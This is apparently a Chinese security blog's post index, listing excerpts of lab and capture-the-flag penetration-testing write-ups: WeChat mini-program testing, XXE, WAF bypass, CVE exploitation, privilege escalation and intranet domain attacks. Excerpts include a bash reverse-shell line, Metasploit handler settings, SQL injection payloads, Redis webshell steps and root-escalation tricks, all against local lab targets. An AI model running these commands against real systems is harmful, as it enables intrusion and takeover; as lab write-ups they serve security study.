自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(67)
  • 收藏
  • 关注

转载 浅谈微信小程序渗透

通过解包,测试人员可以深入研究小程序的逻辑和实现细节,并发现可能存在的信息泄漏问题或隐藏的接口。解包还可以揭示小程序中使用的第三方库、组件和插件,帮助测试人员更好地理解小程序的构建和功能。结合解包和抓包,测试人员可以在调试和测试过程中相互补充。在这个流程中,流量首先从个人电脑上的微信小程序发出,然后通过ProxyPin代理到达Burpsuite工具,最终使用Burpsuite对流量进行修改和重放。小程序测试流程分为两个方面,解包可以挖掘信息泄毒问题、隐藏的接口,抓包可以则试一些逻辑漏洞、API安全问题。

2023-11-22 12:50:13 2883

原创 网络钓鱼方法论

要检测网络钓鱼尝试,了解当今使用的网络钓鱼技术非常重要。在这篇文章的父页面上,您可以找到此信息,因此,如果您不知道今天使用哪些技术,我建议您转到父页面并至少阅读该部分。攻击者将尝试以某种方式模仿或使用受害者的域名。如果您的域名被调用example.com,并且由于某种原因(例如 )而使用完全不同的域名对您进行网络钓鱼youwonthelottery.com,那么这些技术将无法发现它。

2023-11-09 15:39:06 418

原创 XXE-Lab for PHP

2.将PHPStudy的中间件与版本信息调制为。1.在登录界面输入账号密码并抓取数据包....3.使用PHP伪协议读取文件....4.探测内网存活主机与端口...2.尝试读取本地文件....1.将靶场进行下载....访问以下地址开始练习...

2023-09-10 11:24:01 715 1

原创 安全狗V3.512048版本绕过

全狗 safedogwzApacheV3.5.exe右键电脑右下角安全狗图标-->选择插件-->安装插件以管理员身份运行cmd安装apache服务httpd -k install -n apache2.4将服务写上,安装成功之后,注意不要选择在线安装服务器安全狗,安装之后会显示启动web服务失败,这里将phpstudy重启即可使用恶意的参数进行测试下,安全狗生效http://192.168.126.137/sqli-lab/Less-1/?id=1' union select 1,2,3 --

2023-08-02 18:13:09 1286

原创 CVE-2018-12613:本地文件包含

phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。CVE-2018-12613,这是一个在phpMyAdmin4.8.x(4.8.2之前)上发现的文件包含漏洞,攻击者可以利用该漏洞在后台进行任意的文件包含。也就也为着攻击者可以通过webshell直接拿下搭建了该服务的站点。

2023-07-04 18:50:03 650

原创 adroit java反编译

5 union select null, group_concat(column_name) from information_schema.columns where table_schema = 'adroit' and table_name ='users' //查列。7.对获得的加密字符串进行解密,解密的核心代码主要是Cryptor.class文件中的decrypt函数,解密后得到密码just.write.my.ideas。2.用jd-gui 对 java文件查看 ,虚拟机网络链接模式:桥接模式。

2023-06-19 17:00:12 223

原创 Cereal 靶机

因此,当我们尝试注入命令时,它拒绝了输入,所以,如果我们在请求中发送值 True,则根本不会执行 if 块。4.chown.sh它这个命令的强大可以把我想改的文件去更换拥有者,所以创建一个软连接,让它来帮我去执行,/etc/passwd 文件是可读可写可更改的 那我们可以把root用户密码改为空,达到提权的目的。3.chown 需要超级用户 root 的权限才能执行此命令,通过chown改变文件的拥有者和群组 ,我们先查看chown.sh文件,发下只有可读权限,只有root有执行权限。

2023-06-07 10:24:06 486

原创 UDF提权(linux)

secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权。大概就是将程序进行gcc编译,然后再登录mysql进行创建一个表,插入.so文件,创建自定义函数进行越权操作。#secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权。#secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权。

2023-05-23 11:15:03 1493 3

原创 TEMPUS FUGIT: 2

根据之前root路径下有一个网站的wp-content文件夹,怀疑是主机与容器共享一个文件夹,通过刚刚的反弹shell(www-data用户权限)在/var/www/html/wp-content文件夹下面创建一个文件,12.登录auria用户后 ,发现该用户具有root权限免密执行/usr/bin/docker exec *4.在/var/www/html/wp-content/TFDocuments/发现nb.txt。然后回来查看/root/wp/wp-content/文件夹确实多了一文件。

2023-05-16 11:28:41 414

原创 TEMPUS FUGIT: 1

5.报错500 可能对whereis进行了过滤,已知nc:目录在/usr/bin/nc下,用ls命令查看。6.使用nmap命令后,报没有找到,apt命令安装又不行。11.对"."和"/"过滤,那么反弹shell命令的ip改成长类型的十进制。16.把内容改为php-reverse-shell.php的内容 保存。2.在main.py里查看到ftp的域名和用户名和密码。10.成功查看到main文件,说明对"."过滤。7.ls执行后,发现一个main.py的文件。12.访问8080端口,找到之前说的cms。

2023-04-28 14:56:04 850

原创 CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞

CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令。5.因为执行whoami是无回显的,所以需要借助dnslog.cn网站进行回显。

2023-04-12 17:34:49 648

原创 内网渗透--vulntarget-a

1.探测到6379端口,这个端口是redis容易造成未授权访问漏洞,可进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。config set dir "C:/phpStudy/PHPTutorial/WWW/" //切换目录。1.由于靶机开放445端口,并且是win7主机,启动msf进行探测、利用。2.用扫描模块探测主机可能存在永恒之蓝漏洞,进行漏洞利用攻击。11.拿到管理员hash,执行提权exp,成功拿下域控!2.成功连接到redis服务,访问成功,不需要密码。

2023-04-04 17:31:34 1049

原创 红日(vulnstack)5 内网渗透ATT&CK实战

win7 192.168.138.136 (仅主机模式) 192.168.135.150 (NET模式)4.要先run mimikatz拿到密码信息,再填好空格,点击launch 等一会域控就上线了。net group "domain computers" /domain //查看域控。3.成功拿到shell, 执行迁移进程命令, 系统会自动寻找合适的进程然后迁移。9.发现有ms17-010漏洞,并且开放139,135,445端口。4.发现存在漏洞,直接点getshell用蚁剑去连接。

2023-03-27 13:55:50 599

原创 红日(vulnstack)4 内网渗透ATT&CK实战

MS14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码。1.SHELL=bash script -q /dev/null //反弹交互式shell。mount /dev/sda1 hak //将宿主机/dev/sda1 目录挂载至容器内。3.因为靶机作者已经把利用工具已放到了桌面,切换到桌面目录,可以直接利用。./fscan -h 192.168.54.0/24 //开始扫描。8.把本地生成的木马,上传到win7的c盘,然后复制到域控的c盘。

2023-03-21 10:36:20 702

原创 红日(vulnstack)3 内网渗透ATT&CK实战

蚁剑成功连接后无法执行命令,disable_functions插件,权限提升-脏牛漏洞,用msfvenom生成木马文件,msf开启监听,执行木马文件,成功反弹shell到msf上use exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset LHOST 192.168.1.106set LPORT 1106run使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破

2023-03-11 20:54:22 1788

原创 红日(vulnstack)2 内网渗透ATT&CK实战

wls-wsat/CoordinatorPortType11 shell.jsp //上传木马。net group "domain computers" /domain //查看域中的其他主机名。net group "domain controllers" /domain //查看域控制器。net group "domain admins" /domain //查看域管理员。run autoroute -s 10.10.10.0/24 //添加路由。net user /domain //查看域用户。

2023-03-04 18:03:20 1383

原创 红日(vulnstack)1 内网渗透ATT&CK实战

8.link 192.168.52.138 成功上线cs,执行shell whoami 管理员权限,成功拿下!win7 192.168.111.128 192.168.52.143 自定义网卡4,自定义网卡3。kali 192.168.1.108 192.168.111.129 桥接一块,自定义网卡4。开启之后数据库所有运行的日志会记录在general_log_file中。4.net use 发现建立成功后,上传木马程序。1.开启cs,生成木马,上传到蚁剑,执行。6.成功执行,whomi发现是系统权限。红日

2023-02-27 22:36:23 833 1

原创 breach1.0 tomcat war远程部署

keytool -importkeystore -srckeystore /home/weiqin/下载/keystore -destkeystore /home/weiqin/下载/keystore.p12 -deststoretype pkcs12 -srcalias tomcat。8.访问下地址,访问失败,数据是正常的应该能访问到的,用bp抓包,放包来登录;tidyup.sh文件是root权限,tee命令能够写命令,那么用tee命令写tidyup.sh里。7.查看后,发现一段密文,用md5解密下。

2023-02-22 22:43:18 298

原创 october-cms

发现报错,位置在右下角的code,这应该要php代码。8.这次直接把code下面换成反弹shell的php代码,用exech函数来执行。1.谷歌下发现这个October(十月)是一个用php语言搭建的cms。7.再点击preview后没有报错,说明成功添加了一个网页。1.开启监听后,点击preview即可回弹shell。4.查看下8080端口的源码,发现一个超链接信息。3.虽然不能上传文件,但可以添加一个网页。5.访问这个信息,发现用户名,密码。虚拟机网络链接模式:桥接模式。3.直接提权,成功拿下!

2023-02-20 12:43:15 662 1

原创 Venom靶机

2.在网站目录下查看 .htaccess文件,貌似是一个密码,登录nathan用户成功。10.开启监听,点击下面网址触发木马,成功反弹shell。7.将域名写入/etc/hosts文件里,成功访问网页。5.解密成功后是一个标准的维格纳密码,并给出他的网址。1.反弹交互式shell,查看家目录下只有俩个用户。9.进入uploads进行文件上传,上传木马文件。8.点击log in 用破解出的账号密码登录。4.将文本信息下载下来后,发现很多利用信息。虚拟机网络链接模式:桥接模式。2.查看网页最下面,有些信息。

2023-02-15 21:11:04 538 1

原创 clover靶机(SQL注入漏洞)

9.由于是POST类型的,需要抓包进行写入一个clover.txt文档里进行sqlmap探测。5.ssh成功登录sword用户,用find命令查找suid权限的文件,查到一个.sh文件。3.这里说sword用户知道前几位,后面四位的数字忘记了,用crunch制作字典来爆破。2.只能自己一步步的找线索,在/var/backups/下的reminder里有提示。6.用gobuster扫描目录,扫出login.php目录。11.用自己的注入方法去得知密码为asta$$123。虚拟机网络链接模式:桥接模式。

2023-02-06 11:17:03 467

原创 VULNCMS靶机

1.fsociety.web域名添加到/etc/hosts下,正常访问5000端口的wordpress网站。2.上传检查脚本,linpeas.sh(github里有)给执行权限,运行后找到用户名和密码。1.利用joomscan 扫描攻击,对joomla进行漏洞探测。6. 虽然密码加密,但是 email 列有一个看起来像密码。2.发现其版本是3.4.3,找到脚本进行漏洞利用。2.找到cve-2018-7600,查看利用方法。进入wp-login目录,是一个执行命令的界面。2.直接进行反弹shell。

2023-01-28 17:58:34 493

原创 corrosion 靶机(ffuf模糊测试,命令执行)

4.因为22端口开放,又有文件泄露漏洞,那么就可以利用22端口把木马写入auth.log文件里,造成命令执行。4.下载下来后,进行解压不成功需要密码,使用fcrackzip进行破解密码。2.访问网页1发现/archives下面有俩个文件,访问后有一个php文件。1.由于没有找到可利用信息,将linpeas.sh下载下来,进行探测。2.找到一个user_backup.zip文件,应该是一个用户的备份!3.既然这个命令是三个小命令合起来的 ,那么就有三种提权方法!6.开启监听,执行命令,反弹shell成功。

2023-01-13 14:33:44 895

原创 driftingblues7靶机(eyes of network漏洞)

靶机链接:百度网盘 请输入提取码提取码:49by虚拟机网络链接模式:桥接模式攻击机系统:kali linux 2021.11.arp-scan -l2.探测靶机开放端口和服务情况nmap -p- -A -T4 192.168.1.1081.访问8080端口 进去是一个cms2.启用msfconsole搜索eyes of network漏洞3.直接设置参数,攻击成功4.最后也是root权限 轻松拿下!!!

2023-01-10 11:06:28 303

原创 driftingblues6靶机(脏牛漏洞)

这段英文的意思是,警告“strftime():依赖系统的时区设置是不安全的。如果您使用了这些方法中的任何一种,并且仍然收到此警告,您很可能拼写错误了时区标识符。我们现在选择了时区“UTC”,但请设置date.timezone以选择您的时区。5.用unzip解压发现需要密码,那我们用fcrackzip,暴力破解。然后又改了密码,改完之后好像这个交互式界面又不能用了,也许命令在执行中。8.发现content下面的files能上传文件,上传我们的木马。6.正当我要上传dirty.c时,我的交互式界面不能用了。

2023-01-04 10:14:08 618

原创 driftingblues4靶机(zbarimg二维码破解)

cat id_rsa.pub > /home/weiqin/桌面/authorized_keys //cat向已有文件追加内容。直接登录,查看到一个满权限文件夹hubert,可以给他创一个.ssh文件夹,里面添加本地公钥,那不就可以登录ssh了么!3.这边直接把uname命令替换掉,让它执行我写的提权命令,把环境变量改变成优先执行我的uname就行。2.nmap -p- -A -T4 192.168.1.107 扫描靶机开放端口和相应服务。4.执行getinfo命令,直接进入root.成功拿下!

2022-12-28 10:00:23 626

原创 driftingblues3靶机(auth.log日志、命令执行)

1.回弹shell成功后用python来弹交互式shell,在robertj用户下发现.ssh目录。那么我们就可以在用户名处注入可以被执行的脚本然后尝试访问他就可以实现RCE命令执行。8.把ip给替换成可以执行提权的命令,然后把环境变量改了,就可以成功提权。2.看下敏感目录里的信息,不让访问/eventadmins目录。等几分钟再执行curl命令,发现成功记录了登陆的信息。1.故意登录ssh,造成报错,看能否在日志里看到。7.查看之后,发现特别像auth.log的内容。9.最后进入root目录,成功拿下!

2022-12-19 19:52:59 694

原创 driftingblues2靶机(nmap提权)

2.用python3回弹交互式shell后,在freddie用户下,发现.ssh文件。2.访问blog目录,发现老熟人wordpress,和之前一样网页加载不完全。随便点个目录,改成错误的,让它触发404页面,反弹shell。6.用wpscan探测他的用户名,发现一个albert用户名。3.访问.ssh文件后把私钥下载到本地,用来登录ssh。5.写入后,刷新页面,熟悉的页面就回来了。3.用curl命令看源码,发现他的域名。虚拟机网络链接模式:桥接模式。7.爆破一下,成功拿到密码。6.最后也是成功拿下!

2022-12-15 15:15:42 414

原创 driftingblues靶机(0ok编码)

2.一顿命令探测没有可利用的,我直接上传了一个linpeas.sh(github里有)脚本,给他可执行权限就可以运行。2.echo 'L25vdGVmb3JraW5nZmlzaC50eHQ=' -n | base64 -d //解码。bash -i >& /dev/tcp/192.168.1.105/4444 0>&1 //反弹shell。/bin/bash' > emergency //要执行bash命令。5.把域名添加到/etc/hosts 下 再用source刷新。4.再次查看源码,发现一个用户名。

2022-12-12 21:52:16 617

原创 cengbox2靶机(hydra爆破、公私钥免密登录)

靶机链接:百度网盘 请输入提取码提取码:zdpr虚拟机网络链接模式:桥接模式攻击机系统:kali linux 2021.11.arp-scan -l探测目标靶机ip2.nmap -p- -A -T4 192.168.1.107探测目标靶机开放端口和服务3.gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirb/big.txt -t 50用gobuster扫描目录,啥也没有1.登录ftp,将note.txt下载下来2.得到俩个名字ke

2022-12-06 16:36:03 583

原创 ica1靶机(hydra爆破)

靶机链接:百度网盘 请输入提取码提取码:4kn2虚拟机网络链接模式:桥接模式攻击机系统:kali linux 2022.031.探测目标靶机ip2.用nmap探测靶机开放端口和服务nmap -p- -A -sV -T4 192.168.1.1073.用gobuster扫描网站目录gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirb/big.txt -t 100 -x php,txt,html,js,php.bak,txt.bak,

2022-12-04 23:46:57 438

原创 ha wordy靶机(File Inclusion(remote))

5.查看利用方法,大概就是用post方法把action=后面命令提交,然后用shell path后面的命令进行反弹shell。将/etc/passwd文件下载下来,将root密码用openssl进行加盐处理后,把root密码部分替换。5.执行cp命令成功替换/etc/passwd文件,输入密码成功提权!2.找到一个cp命令,那把/etc/passwd文件改了就可以提权了。8.开启监听,根据给出的反弹shell路径,进行反弹!File Inclusion(remote)

2022-12-01 00:04:13 143

原创 broken靶机(计划任务提权)

9.虽然可以利用,但是他这个脚本只能看,不能改,然而之前的script文件夹可是满权限,那么就可以让这个log.py文件改名,让我们自己写的脚本变为log.py。5.这个root下面也有一个backup.py 应该是一样的脚本,根据前面的脚本信息,把/root写入path.txt就能把root目录给复制一份。3.查看path.txt啥也没有,退到根目录下(/和~不是一个目录)查看到一个backup.py的脚本。5.反弹成功之后,查看家目录下的alice用户,发现script目录是一个满权限的文件夹。

2022-11-27 17:36:51 423

原创 healthcare靶机(openEMR管理系统SQL注入漏洞)

6.在files,有一个配置文件可以更改,那么就可以把php-reverse-shell.php(github里有)的代码复制过来。pty.spawn('/bin/bash')" //反弹交互式shell。find / -perm -u=s -type f 2>/dev/null //查询以suid权限执行的文件。2.查看49742.py是一个python脚本,可以利用,只需更改ip 用python3来执行。nmap -p- -A -T4 192.168.1.102 //探测目标靶机开放端口和服务。

2022-11-25 18:19:01 599

原创 cengbox靶机(SQL注入、文件上传漏洞)

将python -c 后面的利用即可因为md5check.py文件本身就是python脚本。4.抓包后看到提示,让上传一个后缀为ceng的文件,那就把木马改成weiqin.ceng。用SHELL=bash script -q /dev/null 回弹 ,还是上传我们的php-reverse-shell.php 文件,7.开启监听成功反弹shell 发现是root 成功拿下!2.发现‘or 1=1--' 可以注入成功 并且登录进去。7.回弹shell成功,发现是一个普通用户。SQL注入、文件上传漏洞

2022-11-23 17:27:50 583

原创 funbox10靶机(命令执行漏洞)

7.这次把命令换为一个可以反弹shell的命令,观察这是php网页,所以执行命令也是用php支持执行的(谷歌php执行命令函数),我们用shell-exec , bash -c 是执行的意思。5.把base_url改为靶机地址,进行访问,网页给出的是一个ls 命令的结果(29行)1.没有可利用的信息和文件,我选择上传本地脚本进行探测(github里有pspy64)2.对扫出的catalog目录进行访问,并且发现其版本号。5.尝试登录root用户,成功登录,顺利拿下!虚拟机网络链接模式:桥接模式。

2022-11-21 15:47:03 621 1

原创 DC-8靶机(SQL注入,46996.sh提权)

用nmap探测靶机开放端口和对应服务情况 nmap -p- -A -T4 192.168.166.136。6.把密码写进hash.txt里用john工具破解出一个密码。1.用find命令查询以suid权限执行的文件。1.探测目标靶机ip arp-scan -l。5.开启http服务,将脚本下载到靶机。8.写入php代码,反弹shell.虚拟机网络链接模式:桥接模式。2.发现一个exim4可利用。4.下载到当前目录下并查看。6.给执行权限,执行没成功。3.查询相关利用脚本。7.添加参数提权成功。

2022-11-19 16:37:10 340

原创 DC-7 (drush更改密码)

10.输入url https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz 报错了,确实无语。3.我一直在等他弹shell,没等来 想着估计时间长,看下计划任务,压根没这个任务,用cat命令看了下,立刻就弹shell了。13.把php-reverse-shell.php(github里有)的代码复制下来,换成kali地址即可。7.然后就进入到/var/www/html目录下,用drush命令修改www-data的密码。

2022-11-17 11:36:36 277

原创 DC-6靶机(wordpress命令执行、nmap提权)

1.需要修改hosts文件(和dc-2操作一样)echo '192.168.166.136 wordy'>>/etc/hosts。3.切换成了jens账户,再次执行sudo -l;我们发现 存在nmap 可以提权了。wpscan --url http://wordy/ -e u //枚举用户。4.登录页面我们发现了存在一个Activity monitor的一个插件。1.尝试ssh登录,发现成功登录;sudo-l 发现可以利用。。wordpress命令执行、nmap提权

2022-11-15 10:37:09 344

原创 funbox11靶机(ProFTPD1.3.3c提权漏洞)

3.上面俩个利用点都失败 ,前面探测到21端口proftpd有版本号。3.按照格式输出命令,成功进去root,轻松拿下!攻击机系统:kali linux 2021.1。1.用smbmap登录smb服务,查找利用信息。1.自己谷歌下版本漏洞可以找到利用的脚本。4.保存到当前目录,查看下,没啥大用。2.执行后发现usage,给出执行格式。2.用wpscan暴力破解用户名密码。2.用gobuster进行目录扫描。1.探测目标靶机开放端口和服务。虚拟机网络链接模式:桥接模式。ProFTPD1.3.3c提权漏洞

2022-11-13 19:19:51 518

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除